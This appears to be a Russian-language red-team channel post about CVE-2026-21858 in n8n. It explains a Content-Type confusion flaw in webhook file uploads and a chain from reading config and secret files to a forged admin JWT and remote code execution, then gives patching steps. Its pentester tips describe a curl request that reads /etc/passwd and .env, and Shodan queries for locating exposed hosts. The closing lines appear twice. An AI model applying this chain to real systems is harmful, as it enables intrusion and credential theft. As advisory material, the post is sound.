- Chain'и: читай creds → forge JWT → expression RCE. PoC уже на GitHub (Chocapikk repo, Cyera write-up, Horizon3 анализ).
Это не хайп — это реальный worst-case для компаний, где n8n — центральный хаб автоматизаций.
Кто уже ловил на проектах? Есть свежие сканы/находки — кидайте в комменты, разберём цепочки вместе!
Патчьте быстро, stay sharp 🛡
#pentest #redteam #n8n #Ni8mare #CVE202621858 #RCE #ethicalhacking #cybersecurity
Братья по ред тиму, это уже классика 2026: automation-инструменты превращаются в новую "Log4Shell".
CVE-2026-21858 (кодовое имя Ni8mare) — критическая дыра в n8n (open-source Zapier на стероидах, особенно популярен для AI-воркфлоу).
Что сломалось?
- Content-Type confusion в обработке webhook/form с file upload.
- Атакующий шлёт запрос НЕ как multipart/form-data, а как JSON (или другой тип) → парсер верит req.body.files → перезаписывает внутренние объекты.
- Итог: arbitrary file read (чтение /etc/passwd, .env, config, encryption keys, JWT secrets, базы creds).
Цепочка до full RCE (самый худший сценарий):
1. Читаем конфиг → достаём encryption key + admin creds / session tokens.
2. Форжим admin JWT → логинимся как владелец.
3. Chain с expression injection (часто CVE-2025-68613 или CVE-2026-21877) → sandbox bypass → RCE на хосте.
Impact:
- Self-hosted n8n с публичными Form Trigger / Webhook → game over.
- ~100k+ exposed инстансов (Cyera/Shodan данные).
- Многие юзают n8n для AI-агентов, internal автоматизаций, creds от AWS/GCP/Slack/DB → pivot везде.
- Активно эксплуатируется в wild (CISA пока не в KEV, но reports летят).
Affected версии:
≤ 1.120.x (конкретно от 1.65.0 и выше, но фикс в 1.121.0)
Фикс вышел: ноябрь 2025 (!), публичный PoC — январь 2026. Многие до сих пор не обновились.
Как фиксить (urgent!):
1. Обнови до 1.121.0+ (лучше latest 1.123.x или 2.x branch).
2. Проверь exposure: /healthz, /rest/workflows, fingerprint "n8n" в Shodan/Censys.
3. Отключи публичные Form/Webhook без auth или за firewall/reverse proxy с жёсткой валидацией Content-Type.
4. Запусти сканер от n8n community: [CVE-2026-21858 Scanner workflow](https://community.n8n.io/t/security-advisory-security-vulnerability-in-n8n-versions-1-65-1-120-4/247305).
5. Mitigation (если update нельзя): выруби все Form nodes с file upload.
Для пентестеров / ред тимеров:
- Ищи: Shodan "n8n" + version <1.121
- Тестируй: curl с custom Content-Type + JSON body → arbitrary file read (/n8n/.n8n/config или /.env).
- Chain'и: читай creds → forge JWT → expression RCE. PoC уже на GitHub (Chocapikk repo, Cyera write-up, Horizon3 анализ).
Это не хайп — это реальный worst-case для компаний, где n8n — центральный хаб автоматизаций.
Кто уже ловил на проектах? Есть свежие сканы/находки — кидайте в комменты, разберём цепочки вместе!
Патчьте быстро, stay sharp 🛡
#pentest #redteam #n8n #Ni8mare #CVE202621858 #RCE #ethicalhacking #cybersecurity
🔥5